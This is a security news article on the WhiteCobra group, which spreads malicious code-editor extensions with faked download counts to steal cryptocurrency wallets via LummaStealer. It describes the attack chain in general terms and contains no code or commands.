WhiteCobra Targets Developers with Dozens of Malicious Extensions
A threat group known as WhiteCobra has been targeting developers using the popular VSCode, Cursor, and Windsurf source code editing tools with a series of malicious extensions, aiming to drain cryptocurrency wallets. Researchers at security firm Koi Security have been tracking WhiteCobra's activities for over a year, noting that the bad actors continue to push new malicious extensions on a weekly basis.
The group has already been linked to several high-profile incidents, including the theft of $500,000 in cryptocurrency from a Russian blockchain developer in June. Zak Cole, an Ethereum developer, also fell victim to one of WhiteCobra's malicious extensions, which drained his crypto wallet despite having a "perfect OpSec record".
Koi Security researcher Yuval Ronen has been following the threat group's activities and wrote in a report over the weekend that WhiteCobra is behind these recent attacks. Ronen noted that Cole "is not just any victim, he's a security professional with a decade of security experience," highlighting the level of sophistication these attacks have achieved.
Ronen also revealed that WhiteCobra can spin up a new campaign in fewer than three hours, including packaging the malicious extension, promoting it, and profiting from it. The threat group's playbook includes information about its operation, infrastructure, promotional strategies, and even "shocking revenue projections" of $10,000 an hour targeting high-value crypto wallets.
The attackers expect to make significant profits by infecting "whale wallets," with revenue projections as high as $500,000 an hour. This highlights the industrialized nature of extension-based attacks, where threat actors operate with precision and profit from their activities.
How WhiteCobra Targets Developers
The campaign starts with the creation of malicious VSIX extensions, which are published on targeted marketplaces such as Open VSX or VSCode. The bad actors use social media like X and bots to promote them, while automated scripts create fake downloads to give the extensions credibility.
"By faking massive numbers of downloads, they continue to trick developers, and sometimes even marketplace review systems, into thinking their extensions are safe, popular, and vetted," Ronen wrote. "To a casual observer, 100K installs signal legitimacy. That's exactly what they're counting on."
The Attack Chain
Once the malicious extension is installed, it downloads a secondary script from Cloudflare Pages that is specific to particular platforms, including Windows.
This script executes a PowerShell script that downloads and executes a Python script, which in turn executes shellcode. The malware, LummaStealer, then steals crypto wallet data from the system, as well as information about connection services like AnyDesk, VPNs, and VNC, cloud infrastructure, messaging platforms, password managers, and wallet and password management browser extensions.
LummaStealer also communicates with two command-and-control (C2) servers. The leaked playbook reveals more than just the tactics used by WhiteCobra; it exposes the industrialization of extension-based attacks.
The Implications
"Threat actors like WhiteCobra are operating with industrialized precision, while everyday have almost no reliable way to tell safe tools from malicious ones," Ronen wrote. "Marketplace ratings, download counts, and even official reviews can all be manipulated, leaving even seasoned professionals vulnerable."
The advantage remains firmly on the side of the attackers without better mechanisms for trust and verification. As developers, it's essential to stay vigilant and keep an eye out for suspicious activity in the marketplace.